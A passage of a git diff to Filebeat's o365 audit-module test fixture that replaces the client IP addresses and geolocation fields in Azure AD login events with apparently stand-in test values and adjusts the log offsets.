"6e184f6f-887b-4410-b24d-723031366000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3c439e46-d454-4767-9320-1e75540821b7"}
diff --git a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json
index 986c8a23ca9a..33ea987e8b64 100644
--- a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json
@@ -1,8 +1,8 @@
 [
 {
 "@timestamp": "2020-02-10T15:13:13.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -37,10 +37,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:13:13",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -69,20 +69,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -100,8 +98,8 @@
 },
 {
 "@timestamp": "2020-02-12T10:53:24.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -119,7 +117,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 1450,
+ "log.offset": 1448,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -136,10 +134,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T10:53:24",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -168,20 +166,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -199,8 +196,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:29:01.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -218,7 +215,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 2901,
+ "log.offset": 2899,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -235,10 +232,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:29:01",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -267,20 +264,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -298,8 +293,8 @@
 },
 {
 "@timestamp": "2020-02-12T10:52:06.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -317,7 +312,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 4293,
+ "log.offset": 4289,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -334,10 +329,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T10:52:06",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -366,20 +361,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -397,8 +391,8 @@
 },
 {
 "@timestamp": "2020-02-12T10:53:22.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -416,7 +410,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 5744,
+ "log.offset": 5740,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -433,10 +427,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T10:53:22",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -465,20 +459,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -496,8 +489,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:23.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -515,7 +508,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 7137,
+ "log.offset": 7133,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -532,10 +525,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:43:23",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -564,20 +557,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -595,8 +586,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:41.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -614,7 +605,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 8587,
+ "log.offset": 8579,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -631,10 +622,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:43:41",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -663,20 +654,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -694,8 +683,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:22.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -713,7 +702,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 10037,
+ "log.offset": 10025,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -730,10 +719,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:43:22",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -762,20 +751,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -793,8 +780,8 @@
 },
 {
 "@timestamp": "2020-02-12T10:52:05.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -812,7 +799,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 11429,
+ "log.offset": 11413,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -829,10 +816,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T10:52:05",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -861,20 +848,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -892,8 +878,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:45.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -911,7 +897,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 12822,
+ "log.offset": 12806,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -928,10 +914,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:43:45",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -960,20 +946,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -991,8 +975,8 @@
 },
 {
 "@timestamp": "2020-02-12T10:51:49.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1010,7 +994,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 14214,
+ "log.offset": 14194,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1027,10 +1011,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T10:51:49",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1059,20 +1043,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -1090,8 +1073,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:29:02.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1109,7 +1092,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 15664,
+ "log.offset": 15644,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1126,10 +1109,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:29:02",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1158,20 +1141,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1189,8 +1170,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:13:08.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
